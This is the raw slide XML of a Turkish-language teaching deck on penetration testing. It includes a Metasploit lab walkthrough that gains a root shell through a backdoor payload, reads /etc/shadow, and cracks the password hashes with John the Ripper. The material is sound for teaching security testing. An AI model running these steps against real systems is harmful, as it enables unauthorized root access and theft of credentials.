                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit konsolunda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set PAYLOAD cmd/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>interact</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yazın ve ENTER’a basın.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit konsolunda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazın ve ENTER’a basın.	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eğer düzgün bir şekilde çalışıyorsa aşağıdakileri görürsünüz:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> service has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>been</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>spawned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=0(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=0(root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Komut satırında </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazın ve ENTER’a basın.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Komut satırında </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazın ve ENTER’a basın.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cat /etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yazın ENTER’a basın.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20916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527739-4081-4D13-8726-DED96C688739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252603" y="688932"/>
            <a:ext cx="9410825" cy="4949869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="14"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Listelenen parola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hash’lerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (karmaları) kopyalayarak (CTRL-SHIFT-C veya sağ tıklama ile) Desktop dizininde bir dosya oluşturup yapıştırın. Dosyayı parola-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> olarak kaydedebilirsiniz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="14"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Terminal ekranında hedef sistemden çıkmak için </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazın ve ENTER’a basın.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="14"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Framework konsolundan çıkmak için tekrar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazın.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="14"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>john /Desktop/parola-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hashes</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komutu ile elde ettiğiniz parola karmalarının parolalarını bulmak için bir John The Ripper taraması başlatın. Tam sonuç elde etmek için en az on dakika beklemelisiniz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417790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7101CF4-D109-4830-815A-0689E7C8562F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kaynaklar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03527739-4081-4D13-8726-DED96C688739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.wikizeroo.com/index.php?q=aHR0cHM6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUGVuZXRyYXRpb25fdGVzdA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.bgasecurity.com/2017/09/10-soruda-sizma-testi/</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.bg-tek.net/penetrasyon-testi</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.ismailsaygili.com.tr/p/penetrasyon-testi.html</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>PRINCIPLES OF COMPUTER SECURITY (FOURTH EDITION)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319977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1522874" y="78910"/>
            <a:ext cx="9134856" cy="1140289"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>İÇİNDEKİLER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="İçerik Yer Tutucusu 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522874" y="1453020"/>
            <a:ext cx="9134856" cy="4759890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon (Sızma) Testi Açıklaması</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testi Çeşitleri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testi Yöntemleri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testinin Amaçları</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testinde Kullanılan Popüler Araçlar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testi Aşamaları</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Framework ile Bir Alıştırmanın Adımları</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kaynaklar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="tr-TR" dirty="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5DE9C02-211E-43AC-9150-DAC04FB3CA3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1344460" y="1409178"/>
            <a:ext cx="9503080" cy="4772416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Penetrasyon testi, şirketlerin bilişim sistemleri üzerindeki ağ altyapılarına, yazılım ve uygulamalarına kötü niyetli kişilerin saldırması ihtimaline binaen, çeşitli yöntemlerle yapılan saldırılara karşı güvenlik açıklarının tespit edilmesi amacıyla gerçekleştirilen sızma işlemlerinin simüle edilerek sonuçların raporlanması işlemidir. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Pentest çalışmalarındaki asıl amaç, zafiyeti tespit etmekten öte ilgili zafiyeti sisteme zarar vermeyecek şekilde istismar etmek ve yetkili erişimler elde etmektir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Unvan 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{830AC87D-B51D-4028-9E06-28507F6DB275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1432142" y="194153"/>
            <a:ext cx="9313270" cy="1102291"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
